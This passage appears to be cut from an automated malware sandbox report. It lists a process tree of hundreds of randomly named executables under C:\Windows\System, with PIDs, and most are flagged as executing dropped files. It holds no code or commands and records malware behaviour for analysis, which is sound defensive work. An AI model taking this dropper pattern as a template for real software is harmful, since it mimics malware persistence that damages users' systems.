  2⤵
  - Executes dropped EXE
  PID:4176
- C:\Windows\System\vEXuHsb.exe
  C:\Windows\System\vEXuHsb.exe
  2⤵
  - Executes dropped EXE
  PID:1636
- C:\Windows\System\XpTQcyR.exe
  C:\Windows\System\XpTQcyR.exe
  2⤵
  - Executes dropped EXE
  PID:4116
- C:\Windows\System\GkiwAHB.exe
  C:\Windows\System\GkiwAHB.exe
  2⤵
  - Executes dropped EXE
  PID:3972
- C:\Windows\System\BWcqwjO.exe
  C:\Windows\System\BWcqwjO.exe
  2⤵
  - Executes dropped EXE
  PID:5064
- C:\Windows\System\cDQdcpv.exe
  C:\Windows\System\cDQdcpv.exe
  2⤵
  - Executes dropped EXE
  PID:3500
- C:\Windows\System\JVUZDPw.exe
  C:\Windows\System\JVUZDPw.exe
  2⤵
  - Executes dropped EXE
  PID:3512
- C:\Windows\System\qbIuCHU.exe
  C:\Windows\System\qbIuCHU.exe
  2⤵
  - Executes dropped EXE
  PID:220
- C:\Windows\System\TUGeWQL.exe
  C:\Windows\System\TUGeWQL.exe
  2⤵
  - Executes dropped EXE
  PID:2212
- C:\Windows\System\zrmsFae.exe
  C:\Windows\System\zrmsFae.exe
  2⤵
  - Executes dropped EXE
  PID:2480
- C:\Windows\System\CkONGBv.exe
  C:\Windows\System\CkONGBv.exe
  2⤵
  - Executes dropped EXE
  PID:2964
- C:\Windows\System\IliVivz.exe
  C:\Windows\System\IliVivz.exe
  2⤵
  - Executes dropped EXE
  PID:4572
- C:\Windows\System\vwEEUyH.exe
  C:\Windows\System\vwEEUyH.exe
  2⤵
  - Executes dropped EXE
  PID:2600
- C:\Windows\System\rkYItzF.exe
  C:\Windows\System\rkYItzF.exe
  2⤵
  - Executes dropped EXE
  PID:2636
- C:\Windows\System\fnNkMMA.exe
  C:\Windows\System\fnNkMMA.exe
  2⤵
  - Executes dropped EXE
  PID:60
- C:\Windows\System\zhsSMhf.exe
  C:\Windows\System\zhsSMhf.exe
  2⤵
  - Executes dropped EXE
  PID:4356
- C:\Windows\System\yePqJFL.exe
  C:\Windows\System\yePqJFL.exe
  2⤵
  - Executes dropped EXE
  PID:4704
- C:\Windows\System\sNITHOE.exe
  C:\Windows\System\sNITHOE.exe
  2⤵
  - Executes dropped EXE
  PID:4588
- C:\Windows\System\zwTUzTg.exe
  C:\Windows\System\zwTUzTg.exe
  2⤵
  - Executes dropped EXE
  PID:892
- C:\Windows\System\wJaqAeI.exe
  C:\Windows\System\wJaqAeI.exe
  2⤵
  - Executes dropped EXE
  PID:2080
- C:\Windows\System\KGzbWii.exe
  C:\Windows\System\KGzbWii.exe
  2⤵
  - Executes dropped EXE
  PID:2808
- C:\Windows\System\JOTBKVK.exe
  C:\Windows\System\JOTBKVK.exe
  2⤵
  - Executes dropped EXE
  PID:404
- C:\Windows\System\WpXGgUo.exe
  C:\Windows\System\WpXGgUo.exe
  2⤵
  - Executes dropped EXE
  PID:4036
- C:\Windows\System\JKtQHoH.exe
  C:\Windows\System\JKtQHoH.exe
  2⤵
  - Executes dropped EXE
  PID:2240
- C:\Windows\System\LucMwPX.exe
  C:\Windows\System\LucMwPX.exe
  2⤵
  - Executes dropped EXE
  PID:1972
- C:\Windows\System\dzDpJNe.exe
  C:\Windows\System\dzDpJNe.exe
  2⤵
  - Executes dropped EXE
  PID:3240
- C:\Windows\System\nemvmvH.exe
  C:\Windows\System\nemvmvH.exe
  2⤵
  - Executes dropped EXE
  PID:2292
- C:\Windows\System\whZGzPk.exe
  C:\Windows\System\whZGzPk.exe
  2⤵
  - Executes dropped EXE
  PID:2896
- C:\Windows\System\OnGuKIt.exe
  C:\Windows\System\OnGuKIt.exe
  2⤵
  - Executes dropped EXE
  PID:332
- C:\Windows\System\mUUHzkf.exe
  C:\Windows\System\mUUHzkf.exe
  2⤵
  - Executes dropped EXE
  PID:3448
- C:\Windows\System\PQfxniW.exe
  C:\Windows\System\PQfxniW.exe
  2⤵
  - Executes dropped EXE
  PID:4944
- C:\Windows\System\oomIHNQ.exe
  C:\Windows\System\oomIHNQ.exe
  2⤵
  - Executes dropped EXE
  PID:1572
- C:\Windows\System\JfqBtQV.exe
  C:\Windows\System\JfqBtQV.exe
  2⤵
  - Executes dropped EXE
  PID:3372
- C:\Windows\System\eXQXaNE.exe
  C:\Windows\System\eXQXaNE.exe
  2⤵
  - Executes dropped EXE
  PID:5072
- C:\Windows\System\YMycAai.exe
  C:\Windows\System\YMycAai.exe
  2⤵
  - Executes dropped EXE
  PID:1612
- C:\Windows\System\raffwKO.exe
  C:\Windows\System\raffwKO.exe
  2⤵
  - Executes dropped EXE
  PID:1984
- C:\Windows\System\MLjSSyv.exe
  C:\Windows\System\MLjSSyv.exe
  2⤵
  - Executes dropped EXE
  PID:3748
- C:\Windows\System\XCBdney.exe
  C:\Windows\System\XCBdney.exe
  2⤵
  - Executes dropped EXE
  PID:2648
- C:\Windows\System\JmmQqJi.exe
  C:\Windows\System\JmmQqJi.exe
  2⤵
  - Executes dropped EXE
  PID:4636
- C:\Windows\System\pdMmfQR.exe
  C:\Windows\System\pdMmfQR.exe
  2⤵
  - Executes dropped EXE
  PID:1084
- C:\Windows\System\rPGkqNG.exe
  C:\Windows\System\rPGkqNG.exe
  2⤵
  - Executes dropped EXE
  PID:4624
- C:\Windows\System\NCCbpYd.exe
  C:\Windows\System\NCCbpYd.exe
  2⤵
  - Executes dropped EXE
  PID:2340
- C:\Windows\System\HfuTNrV.exe
  C:\Windows\System\HfuTNrV.exe
  2⤵
  - Executes dropped EXE
  PID:4640
- C:\Windows\System\nNWNUrd.exe
  C:\Windows\System\nNWNUrd.exe
  2⤵
  - Executes dropped EXE
  PID:780
- C:\Windows\System\MXRxxgs.exe
  C:\Windows\System\MXRxxgs.exe
  2⤵
  - Executes dropped EXE
  PID:1580
- C:\Windows\System\cqmZeOt.exe
  C:\Windows\System\cqmZeOt.exe
  2⤵
  - Executes dropped EXE
  PID:4888
- C:\Windows\System\saJDWBB.exe
  C:\Windows\System\saJDWBB.exe
  2⤵
  - Executes dropped EXE
  PID:1504
- C:\Windows\System\lXnuZHm.exe
  C:\Windows\System\lXnuZHm.exe
  2⤵
  - Executes dropped EXE
  PID:2948
- C:\Windows\System\GOzkAHS.exe
  C:\Windows\System\GOzkAHS.exe
  2⤵
  - Executes dropped EXE
  PID:1608
- C:\Windows\System\htoEGKJ.exe
  C:\Windows\System\htoEGKJ.exe
  2⤵
  - Executes dropped EXE
  PID:2956
- C:\Windows\System\bwbtXej.exe
  C:\Windows\System\bwbtXej.exe
  2⤵
  - Executes dropped EXE
  PID:2284
- C:\Windows\System\ZPdiCcD.exe
  C:\Windows\System\ZPdiCcD.exe
  2⤵
  - Executes dropped EXE
  PID:4140
- C:\Windows\System\tBnvqLA.exe
  C:\Windows\System\tBnvqLA.exe
  2⤵
  - Executes dropped EXE
  PID:1800
- C:\Windows\System\ASgDoZN.exe
  C:\Windows\System\ASgDoZN.exe
  2⤵
  PID:4680
- C:\Windows\System\kVBtZXS.exe
  C:\Windows\System\kVBtZXS.exe
  2⤵
  PID:3916
- C:\Windows\System\fOrkMUr.exe
  C:\Windows\System\fOrkMUr.exe
  2⤵
  PID:3628
- C:\Windows\System\bxmmeaR.exe
  C:\Windows\System\bxmmeaR.exe
  2⤵
  PID:2384
- C:\Windows\System\oJcdQjj.exe
  C:\Windows\System\oJcdQjj.exe
  2⤵
  PID:4740
- C:\Windows\System\GXKfIsV.exe
  C:\Windows\System\GXKfIsV.exe
  2⤵
  PID:3272
- C:\Windows\System\gRMaQQH.exe
  C:\Windows\System\gRMaQQH.exe
  2⤵
  PID:1124
- C:\Windows\System\IXYiGbo.exe
  C:\Windows\System\IXYiGbo.exe
  2⤵
  PID:4728
- C:\Windows\System\pPGPoEn.exe
  C:\Windows\System\pPGPoEn.exe
  2⤵
  PID:3220
- C:\Windows\System\xYDTnif.exe
  C:\Windows\System\xYDTnif.exe
  2⤵
  PID:2540
- C:\Windows\System\QxvWXbm.exe
  C:\Windows\System\QxvWXbm.exe
  2⤵
  PID:5052
- C:\Windows\System\XsnFxFy.exe
  C:\Windows\System\XsnFxFy.exe
  2⤵
  PID:1160
- C:\Windows\System\SaIhHtZ.exe
  C:\Windows\System\SaIhHtZ.exe
  2⤵
  PID:3768
- C:\Windows\System\AiZaCsv.exe
  C:\Windows\System\AiZaCsv.exe
  2⤵
  PID:872
- C:\Windows\System\esgboRq.exe
  C:\Windows\System\esgboRq.exe
  2⤵
  PID:2704
- C:\Windows\System\FhaVHFJ.exe
  C:\Windows\System\FhaVHFJ.exe
  2⤵
  PID:1908
- C:\Windows\System\UQPmlhl.exe
  C:\Windows\System\UQPmlhl.exe
  2⤵
  PID:512
- C:\Windows\System\XlNppZw.exe
  C:\Windows\System\XlNppZw.exe
  2⤵
  PID:4972
- C:\Windows\System\YModIRz.exe
  C:\Windows\System\YModIRz.exe
  2⤵
  PID:2688
- C:\Windows\System\JVtBmNd.exe
  C:\Windows\System\JVtBmNd.exe
  2⤵
  PID:4104
- C:\Windows\System\Sampsyg.exe
  C:\Windows\System\Sampsyg.exe
  2⤵
  PID:2352
- C:\Windows\System\sWaqjcr.exe
  C:\Windows\System\sWaqjcr.exe
  2⤵
  PID:1156
- C:\Windows\System\cIQYvBQ.exe
  C:\Windows\System\cIQYvBQ.exe
  2⤵
  PID:3824
- C:\Windows\System\eHQngNs.exe
  C:\Windows\System\eHQngNs.exe
  2⤵
  PID:3140
- C:\Windows\System\dyiLPNT.exe
  C:\Windows\System\dyiLPNT.exe
  2⤵
  PID:4136
- C:\Windows\System\WJOatRU.exe
  C:\Windows\System\WJOatRU.exe
  2⤵
  PID:3896
- C:\Windows\System\uGCEMsp.exe
  C:\Windows\System\uGCEMsp.exe
  2⤵
  PID:4420
- C:\Windows\System\Pthullh.exe
  C:\Windows\System\Pthullh.exe
  2⤵
  PID:3216
- C:\Windows\System\pUgcJbO.exe
  C:\Windows\System\pUgcJbO.exe
  2⤵
  PID:3692
- C:\Windows\System\jREXoTG.exe
  C:\Windows\System\jREXoTG.exe
  2⤵
  PID:4664
- C:\Windows\System\ywfUxiM.exe
  C:\Windows\System\ywfUxiM.exe
  2⤵
  PID:2596
- C:\Windows\System\oWkbWPs.exe
  C:\Windows\System\oWkbWPs.exe
  2⤵
  PID:1712
- C:\Windows\System\UEHfwhu.exe
  C:\Windows\System\UEHfwhu.exe
  2⤵
  PID:3884
- C:\Windows\System\IZFhvcr.exe
  C:\Windows\System\IZFhvcr.exe
  2⤵
  PID:5132
- C:\Windows\System\qZPlszS.exe
  C:\Windows\System\qZPlszS.exe
  2⤵
  PID:5156
- C:\Windows\System\bOxKixl.exe
  C:\Windows\System\bOxKixl.exe
  2⤵
  PID:5216
- C:\Windows\System\DljtzWF.exe
  C:\Windows\System\DljtzWF.exe
  2⤵
  PID:5244
- C:\Windows\System\BlPmLmc.exe
  C:\Windows\System\BlPmLmc.exe
  2⤵
  PID:5276
- C:\Windows\System\QqxQtFj.exe
  C:\Windows\System\QqxQtFj.exe
  2⤵
  PID:5296
- C:\Windows\System\BejhDwE.exe
  C:\Windows\System\BejhDwE.exe
  2⤵
  PID:5316
- C:\Windows\System\NwvYfGn.exe
  C:\Windows\System\NwvYfGn.exe
  2⤵
  PID:5368
- C:\Windows\System\QminyCB.exe
  C:\Windows\System\QminyCB.exe
  2⤵
  PID:5396
- C:\Windows\System\gBCLtaa.exe
  C:\Windows\System\gBCLtaa.exe
  2⤵
  PID:5416
- C:\Windows\System\SLBqWZQ.exe
  C:\Windows\System\SLBqWZQ.exe
  2⤵
  PID:5444
- C:\Windows\System\OauEVEt.exe
  C:\Windows\System\OauEVEt.exe
  2⤵
  PID:5492
- C:\Windows\System\dXahmny.exe
  C:\Windows\System\dXahmny.exe
  2⤵
  PID:5508
- C:\Windows\System\wuViiFf.exe
  C:\Windows\System\wuViiFf.exe
  2⤵
  PID:5528
- C:\Windows\System\kRhSfVW.exe
  C:\Windows\System\kRhSfVW.exe
  2⤵
  PID:5552
- C:\Windows\System\gngSfDV.exe
  C:\Windows\System\gngSfDV.exe
  2⤵
  PID:5592
- C:\Windows\System\JXMZsZo.exe
  C:\Windows\System\JXMZsZo.exe
  2⤵
  PID:5612
- C:\Windows\System\iXALFUW.exe
  C:\Windows\System\iXALFUW.exe
  2⤵
  PID:5640
- C:\Windows\System\eogIgXt.exe
  C:\Windows\System\eogIgXt.exe
  2⤵
  PID:5656
- C:\Windows\System\MUAcltP.exe
  C:\Windows\System\MUAcltP.exe
  2⤵
  PID:5684
- C:\Windows\System\OJFhpEJ.exe
  C:\Windows\System\OJFhpEJ.exe
  2⤵
  PID:5704
- C:\Windows\System\quFjhgt.exe
  C:\Windows\System\quFjhgt.exe
  2⤵
  PID:5724
- C:\Windows\System\ljOSNdz.exe
  C:\Windows\System\ljOSNdz.exe
  2⤵
  PID:5744
- C:\Windows\System\maCSxru.exe
  C:\Windows\System\maCSxru.exe
  2⤵
  PID:5768
- C:\Windows\System\EHZcgmQ.exe
  C:\Windows\System\EHZcgmQ.exe
  2⤵
  PID:5788
- C:\Windows\System\sekjWxM.exe
  C:\Windows\System\sekjWxM.exe
  2⤵
  PID:5804
- C:\Windows\System\BrqWQiu.exe
  C:\Windows\System\BrqWQiu.exe
  2⤵
  PID:5832
- C:\Windows\System\nSlvYCV.exe
  C:\Windows\System\nSlvYCV.exe
  2⤵
  PID:5852
- C:\Windows\System\SfOmtsr.exe
  C:\Windows\System\SfOmtsr.exe
  2⤵
  PID:5868
- C:\Windows\System\cTSIuIQ.exe
  C:\Windows\System\cTSIuIQ.exe
  2⤵
  PID:5932
- C:\Windows\System\CEbPIAS.exe
  C:\Windows\System\CEbPIAS.exe
  2⤵
  PID:5956
- C:\Windows\System\VgEdAhV.exe
  C:\Windows\System\VgEdAhV.exe
  2⤵
  PID:5996
- C:\Windows\System\FlcOqgu.exe
  C:\Windows\System\FlcOqgu.exe
  2⤵
  PID:6020
- C:\Windows\System\KtayINw.exe
  C:\Windows\System\KtayINw.exe
  2⤵
  PID:6072
- C:\Windows\System\EBPditb.exe
  C:\Windows\System\EBPditb.exe
  2⤵
  PID:6092
- C:\Windows\System\iuLlvky.exe
  C:\Windows\System\iuLlvky.exe
  2⤵
  PID:3104
- C:\Windows\System\RKOfMsK.exe
  C:\Windows\System\RKOfMsK.exe
  2⤵
  PID:5044
- C:\Windows\System\oAyGGGh.exe
  C:\Windows\System\oAyGGGh.exe
  2⤵
  PID:5164
- C:\Windows\System\tTrXvqE.exe
  C:\Windows\System\tTrXvqE.exe
  2⤵
  PID:5236
- C:\Windows\System\zEkrkhC.exe
  C:\Windows\System\zEkrkhC.exe
  2⤵
  PID:5284
- C:\Windows\System\tBVBrui.exe
  C:\Windows\System\tBVBrui.exe
  2⤵
  PID:5336
- C:\Windows\System\UQDsHcn.exe
  C:\Windows\System\UQDsHcn.exe
  2⤵
  PID:5360
- C:\Windows\System\ULoxigA.exe
  C:\Windows\System\ULoxigA.exe
  2⤵
  PID:5468
- C:\Windows\System\IuOcBOQ.exe
  C:\Windows\System\IuOcBOQ.exe
  2⤵
  PID:4472
- C:\Windows\System\fEOiYnm.exe
  C:\Windows\System\fEOiYnm.exe
  2⤵
  PID:5632
- C:\Windows\System\hsSeIVJ.exe
  C:\Windows\System\hsSeIVJ.exe
  2⤵
  PID:5696
- C:\Windows\System\CjbAtIL.exe
  C:\Windows\System\CjbAtIL.exe
  2⤵
  PID:5672
- C:\Windows\System\ySxDPcB.exe
  C:\Windows\System\ySxDPcB.exe
  2⤵
  PID:5896
- C:\Windows\System\bnQQGXw.exe
  C:\Windows\System\bnQQGXw.exe
  2⤵
  PID:5940
- C:\Windows\System\zoEPpoh.exe
  C:\Windows\System\zoEPpoh.exe
  2⤵
  PID:6012
- C:\Windows\System\OGfiSEd.exe
  C:\Windows\System\OGfiSEd.exe
  2⤵
  PID:6032
- C:\Windows\System\lQTZxza.exe
  C:\Windows\System\lQTZxza.exe
  2⤵
  PID:6104
- C:\Windows\System\QMlhZiQ.exe
  C:\Windows\System\QMlhZiQ.exe
  2⤵
  PID:5180
- C:\Windows\System\hzBkhxa.exe
  C:\Windows\System\hzBkhxa.exe
  2⤵
  PID:5204
- C:\Windows\System\NAGZnUo.exe
  C:\Windows\System\NAGZnUo.exe
  2⤵
  PID:5292
- C:\Windows\System\ibXryhS.exe
  C:\Windows\System\ibXryhS.exe
  2⤵
  PID:5576
- C:\Windows\System\iNkzMJz.exe
  C:\Windows\System\iNkzMJz.exe
  2⤵
  PID:5692
- C:\Windows\System\NUuhLjT.exe
  C:\Windows\System\NUuhLjT.exe
  2⤵
  PID:5908
- C:\Windows\System\qsqKisr.exe
  C:\Windows\System\qsqKisr.exe
  2⤵
  PID:5148
- C:\Windows\System\mSNlGNR.exe
  C:\Windows\System\mSNlGNR.exe
  2⤵
  PID:5648
- C:\Windows\System\BrlPyVy.exe
  C:\Windows\System\BrlPyVy.exe
  2⤵
  PID:5288
- C:\Windows\System\WfHOEXy.exe
  C:\Windows\System\WfHOEXy.exe
  2⤵
  PID:5720
- C:\Windows\System\phfiigy.exe
  C:\Windows\System\phfiigy.exe
  2⤵
  PID:6068
- C:\Windows\System\uvOtybL.exe
  C:\Windows\System\uvOtybL.exe
  2⤵
  PID:5476
- C:\Windows\System\gyWEwwM.exe
  C:\Windows\System\gyWEwwM.exe
  2⤵
  PID:6196
- C:\Windows\System\PisgPdw.exe
  C:\Windows\System\PisgPdw.exe
  2⤵
  PID:6224
- C:\Windows\System\uKfakyM.exe
  C:\Windows\System\uKfakyM.exe
  2⤵
  PID:6252
- C:\Windows\System\qWBskDc.exe
  C:\Windows\System\qWBskDc.exe
  2⤵
  PID:6272
- C:\Windows\System\tNzKSTT.exe
  C:\Windows\System\tNzKSTT.exe
  2⤵
  PID:6304
- C:\Windows\System\TrQGPqE.exe
  C:\Windows\System\TrQGPqE.exe
  2⤵
  PID:6324
- C:\Windows\System\ITyviGm.exe
  C:\Windows\System\ITyviGm.exe
  2⤵
  PID:6368
- C:\Windows\System\vkfuTOt.exe
  C:\Windows\System\vkfuTOt.exe
  2⤵
  PID:6412
- C:\Windows\System\JyLBHhf.exe
  C:\Windows\System\JyLBHhf.exe
  2⤵
  PID:6428
- C:\Windows\System\xcoNWYe.exe
  C:\Windows\System\xcoNWYe.exe
  2⤵
  PID:6468
- C:\Windows\System\VIYpDLV.exe
  C:\Windows\System\VIYpDLV.exe
  2⤵
  PID:6488
- C:\Windows\System\HXIArcV.exe
  C:\Windows\System\HXIArcV.exe
  2⤵
  PID:6512
- C:\Windows\System\nvVjZRB.exe
  C:\Windows\System\nvVjZRB.exe
  2⤵
  PID:6528
- C:\Windows\System\EiemJuy.exe
  C:\Windows\System\EiemJuy.exe
  2⤵
  PID:6548
- C:\Windows\System\ZGogmHp.exe
  C:\Windows\System\ZGogmHp.exe
  2⤵
  PID:6572
- C:\Windows\System\ngWgHnW.exe
  C:\Windows\System\ngWgHnW.exe
  2⤵
  PID:6592
- C:\Windows\System\vCEmbxh.exe
  C:\Windows\System\vCEmbxh.exe
  2⤵
  PID:6616
- C:\Windows\System\Lbeudxq.exe
  C:\Windows\System\Lbeudxq.exe
  2⤵
  PID:6636
- C:\Windows\System\AJiVGvK.exe
  C:\Windows\System\AJiVGvK.exe
  2⤵
  PID:6664
- C:\Windows\System\sFtUIpp.exe
  C:\Windows\System\sFtUIpp.exe
  2⤵
  PID:6696
- C:\Windows\System\wbwQZWv.exe
  C:\Windows\System\wbwQZWv.exe
  2⤵
  PID:6716
- C:\Windows\System\nLAtmHa.exe
  C:\Windows\System\nLAtmHa.exe
  2⤵
  PID:6760
- C:\Windows\System\XREGDex.exe
  C:\Windows\System\XREGDex.exe
  2⤵
  PID:6792
- C:\Windows\System\SKxdgaA.exe
  C:\Windows\System\SKxdgaA.exe
  2⤵
  PID:6820
- C:\Windows\System\keSZZjI.exe
  C:\Windows\System\keSZZjI.exe
  2⤵
  PID:6856
- C:\Windows\System\ozvUXEe.exe
  C:\Windows\System\ozvUXEe.exe
  2⤵
  PID:6896
- C:\Windows\System\cYlFBnk.exe
  C:\Windows\System\cYlFBnk.exe
  2⤵
  PID:6916
- C:\Windows\System\fdHlgRV.exe
  C:\Windows\System\fdHlgRV.exe
  2⤵
  PID:6944
- C:\Windows\System\XXVlDdm.exe
  C:\Windows\System\XXVlDdm.exe
  2⤵
  PID:6976
- C:\Windows\System\tmKnTTe.exe
  C:\Windows\System\tmKnTTe.exe
  2⤵
  PID:6996
- C:\Windows\System\EpxKtSP.exe
  C:\Windows\System\EpxKtSP.exe
  2⤵
  PID:7016
- C:\Windows\System\EXjQBkD.exe
  C:\Windows\System\EXjQBkD.exe
  2⤵
  PID:7044
- C:\Windows\System\nshfrGW.exe
  C:\Windows\System\nshfrGW.exe
  2⤵
  PID:7076
- C:\Windows\System\izTgThc.exe
  C:\Windows\System\izTgThc.exe
  2⤵
  PID:7100
- C:\Windows\System\QpQJLbP.exe
  C:\Windows\System\QpQJLbP.exe
  2⤵
  PID:7124
- C:\Windows\System\lVkHudZ.exe
  C:\Windows\System\lVkHudZ.exe
  2⤵
  PID:5812
- C:\Windows\System\yZtvgia.exe
  C:\Windows\System\yZtvgia.exe
  2⤵
  PID:5740
- C:\Windows\System\pXDzlCg.exe
  C:\Windows\System\pXDzlCg.exe
  2⤵
  PID:6208
- C:\Windows\System\XZjCZep.exe
  C:\Windows\System\XZjCZep.exe
  2⤵
  PID:6356
- C:\Windows\System\sCBwsoP.exe
  C:\Windows\System\sCBwsoP.exe
  2⤵
  PID:6408
- C:\Windows\System\npIOSNc.exe
  C:\Windows\System\npIOSNc.exe
  2⤵
  PID:6464
- C:\Windows\System\xmMyhaY.exe
  C:\Windows\System\xmMyhaY.exe
  2⤵
  PID:6484
- C:\Windows\System\SOpeUeM.exe
  C:\Windows\System\SOpeUeM.exe
  2⤵
  PID:6612
- C:\Windows\System\shNGSYK.exe
  C:\Windows\System\shNGSYK.exe
  2⤵
  PID:6652
- C:\Windows\System\FhbnEZT.exe
  C:\Windows\System\FhbnEZT.exe
  2⤵
  PID:6692
- C:\Windows\System\asvLhfd.exe
  C:\Windows\System\asvLhfd.exe
  2⤵
  PID:6752
- C:\Windows\System\DrxxJiG.exe
  C:\Windows\System\DrxxJiG.exe
  2⤵
  PID:6800
- C:\Windows\System\jvfKmYf.exe
  C:\Windows\System\jvfKmYf.exe
  2⤵
  PID:6852
- C:\Windows\System\KAsilZA.exe
  C:\Windows\System\KAsilZA.exe
  2⤵
  PID:6884
- C:\Windows\System\TtrYMnE.exe
  C:\Windows\System\TtrYMnE.exe
  2⤵
  PID:6940
- C:\Windows\System\lQRcCNH.exe
  C:\Windows\System\lQRcCNH.exe
  2⤵
  PID:7032
- C:\Windows\System\qQKlmrk.exe
  C:\Windows\System\qQKlmrk.exe
  2⤵
  PID:7072
- C:\Windows\System\XWzsMpr.exe
  C:\Windows\System\XWzsMpr.exe
  2⤵
  PID:7112
- C:\Windows\System\quaCrzO.exe
  C:\Windows\System\quaCrzO.exe
  2⤵
  PID:6188
- C:\Windows\System\JvhrZLE.exe
  C:\Windows\System\JvhrZLE.exe
  2⤵
  PID:6336
- C:\Windows\System\OhMgeKH.exe
  C:\Windows\System\OhMgeKH.exe
  2⤵
  PID:6460
- C:\Windows\System\DDAuLez.exe
  C:\Windows\System\DDAuLez.exe
  2⤵
  PID:6568
- C:\Windows\System\pUjpdOl.exe
  C:\Windows\System\pUjpdOl.exe
  2⤵
  PID:6828
- C:\Windows\System\TLHoPYQ.exe
  C:\Windows\System\TLHoPYQ.exe
  2⤵
  PID:6936
- C:\Windows\System\XOQAaWv.exe
  C:\Windows\System\XOQAaWv.exe
  2⤵
  PID:7096
- C:\Windows\System\JwKggZD.exe
  C:\Windows\System\JwKggZD.exe
  2⤵
  PID:6392
- C:\Windows\System\NPfyvjV.exe
  C:\Windows\System\NPfyvjV.exe
  2⤵
  PID:7036
- C:\Windows\System\QxXtgmD.exe
  C:\Windows\System\QxXtgmD.exe
  2⤵
  PID:7172
- C:\Windows\System\vJZlhyW.exe
  C:\Windows\System\vJZlhyW.exe
  2⤵
  PID:7200
- C:\Windows\System\nSAWkAO.exe
  C:\Windows\System\nSAWkAO.exe
  2⤵
  PID:7220
- C:\Windows\System\tBOXJgj.exe
  C:\Windows\System\tBOXJgj.exe
  2⤵
  PID:7260
- C:\Windows\System\nnnrHFh.exe
  C:\Windows\System\nnnrHFh.exe
  2⤵
  PID:7284
- C:\Windows\System\JEcbIRb.exe
  C:\Windows\System\JEcbIRb.exe
  2⤵
  PID:7304
- C:\Windows\System\UoKuEaL.exe
  C:\Windows\System\UoKuEaL.exe
  2⤵
  PID:7328
- C:\Windows\System\YFbeDVC.exe
  C:\Windows\System\YFbeDVC.exe
  2⤵
  PID:7380
- C:\Windows\System\hCHoALc.exe
  C:\Windows\System\hCHoALc.exe
  2⤵
  PID:7404
- C:\Windows\System\jriFEAQ.exe
  C:\Windows\System\jriFEAQ.exe
  2⤵
  PID:7424
- C:\Windows\System\fQJRPdR.exe
  C:\Windows\System\fQJRPdR.exe
  2⤵
  PID:7448
- C:\Windows\System\SYsCRuH.exe
  C:\Windows\System\SYsCRuH.exe
  2⤵
  PID:7468
- C:\Windows\System\HBXlZAI.exe
  C:\Windows\System\HBXlZAI.exe
  2⤵
  PID:7488
- C:\Windows\System\BfdEvHF.exe
  C:\Windows\System\BfdEvHF.exe
  2⤵
  PID:7556
- C:\Windows\System\ZCUmpiI.exe
  C:\Windows\System\ZCUmpiI.exe
  2⤵
  PID:7604
- C:\Windows\System\zvvLYqX.exe
  C:\Windows\System\zvvLYqX.exe
  2⤵
  PID:7624
- C:\Windows\System\fNhNIFn.exe
  C:\Windows\System\fNhNIFn.exe
  2⤵
  PID:7668
- C:\Windows\System\iWksIsQ.exe
  C:\Windows\System\iWksIsQ.exe
  2⤵
  PID:7728
- C:\Windows\System\BQVaqpH.exe
  C:\Windows\System\BQVaqpH.exe
  2⤵
  PID:7780
- C:\Windows\System\Zuttbaq.exe
  C:\Windows\System\Zuttbaq.exe
  2⤵
  PID:7804
- C:\Windows\System\NeAjpKs.exe
  C:\Windows\System\NeAjpKs.exe
  2⤵
  PID:7836
- C:\Windows\System\NEfDmhm.exe
  C:\Windows\System\NEfDmhm.exe
  2⤵
  PID:7852
- C:\Windows\System\dVzUebz.exe
  C:\Windows\System\dVzUebz.exe
  2⤵
  PID:7872
- C:\Windows\System\XYnlBAJ.exe
  C:\Windows\System\XYnlBAJ.exe
  2⤵
  PID:7888
- C:\Windows\System\pCIFUrD.exe
  C:\Windows\System\pCIFUrD.exe
  2⤵
  PID:7904
- C:\Windows\System\BRkYUjo.exe
  C:\Windows\System\BRkYUjo.exe
  2⤵
  PID:7920
- C:\Windows\System\BPkElXn.exe
  C:\Windows\System\BPkElXn.exe
  2⤵
  PID:7936
- C:\Windows\System\gPzkujT.exe
  C:\Windows\System\gPzkujT.exe
  2⤵
  PID:7956
- C:\Windows\System\IFbhqPz.exe
  C:\Windows\System\IFbhqPz.exe
  2⤵
  PID:7980
- C:\Windows\System\zWSGvFt.exe
  C:\Windows\System\zWSGvFt.exe
  2⤵
  PID:8004
- C:\Windows\System\jbQIGse.exe
  C:\Windows\System\jbQIGse.exe
  2⤵
  PID:8040
- C:\Windows\System\uFWMUUn.exe
  C:\Windows\System\uFWMUUn.exe
  2⤵
  PID:8060
- C:\Windows\System\fdwEgDA.exe
  C:\Windows\System\fdwEgDA.exe
  2⤵
  PID:8144
- C:\Windows\System\SeVJepr.exe
  C:\Windows\System\SeVJepr.exe
  2⤵
  PID:8164
- C:\Windows\System\pBYaGQJ.exe
  C:\Windows\System\pBYaGQJ.exe
  2⤵
  PID:7192
- C:\Windows\System\KLekYCo.exe
  C:\Windows\System\KLekYCo.exe
  2⤵
  PID:7276
- C:\Windows\System\OiNzYfp.exe
  C:\Windows\System\OiNzYfp.exe
  2⤵
  PID:7320
- C:\Windows\System\NvmBviT.exe
  C:\Windows\System\NvmBviT.exe
  2⤵
  PID:7396
- C:\Windows\System\ONhgmqb.exe
  C:\Windows\System\ONhgmqb.exe
  2⤵
  PID:7484
- C:\Windows\System\ivwKRjG.exe
  C:\Windows\System\ivwKRjG.exe
  2⤵
  PID:2180
- C:\Windows\System\ZxcZHlk.exe
  C:\Windows\System\ZxcZHlk.exe
  2⤵
  PID:7700
- C:\Windows\System\TUSSFSJ.exe
  C:\Windows\System\TUSSFSJ.exe
  2⤵
  PID:7720
- C:\Windows\System\hylSXRq.exe
  C:\Windows\System\hylSXRq.exe
  2⤵
  PID:7832
- C:\Windows\System\bmiGSYw.exe
  C:\Windows\System\bmiGSYw.exe
  2⤵
  PID:7656
- C:\Windows\System\EBxlTee.exe
  C:\Windows\System\EBxlTee.exe
  2⤵
  PID:7848
- C:\Windows\System\gxWrmFb.exe
  C:\Windows\System\gxWrmFb.exe
  2⤵
  PID:7896
- C:\Windows\System\OvARsQp.exe
  C:\Windows\System\OvARsQp.exe
  2⤵
  PID:7952
- C:\Windows\System\SBwMGbq.exe
  C:\Windows\System\SBwMGbq.exe
  2⤵
  PID:7880
- C:\Windows\System\hxYCsZI.exe
  C:\Windows\System\hxYCsZI.exe
  2⤵
  PID:7972
- C:\Windows\System\DNNONCe.exe
  C:\Windows\System\DNNONCe.exe
  2⤵
  PID:7932
- C:\Windows\System\DSPsfvP.exe
  C:\Windows\System\DSPsfvP.exe
  2⤵
  PID:8056
- C:\Windows\System\HpPUOWK.exe
  C:\Windows\System\HpPUOWK.exe
  2⤵
  PID:8112
- C:\Windows\System\DJDCYlm.exe
  C:\Windows\System\DJDCYlm.exe
  2⤵
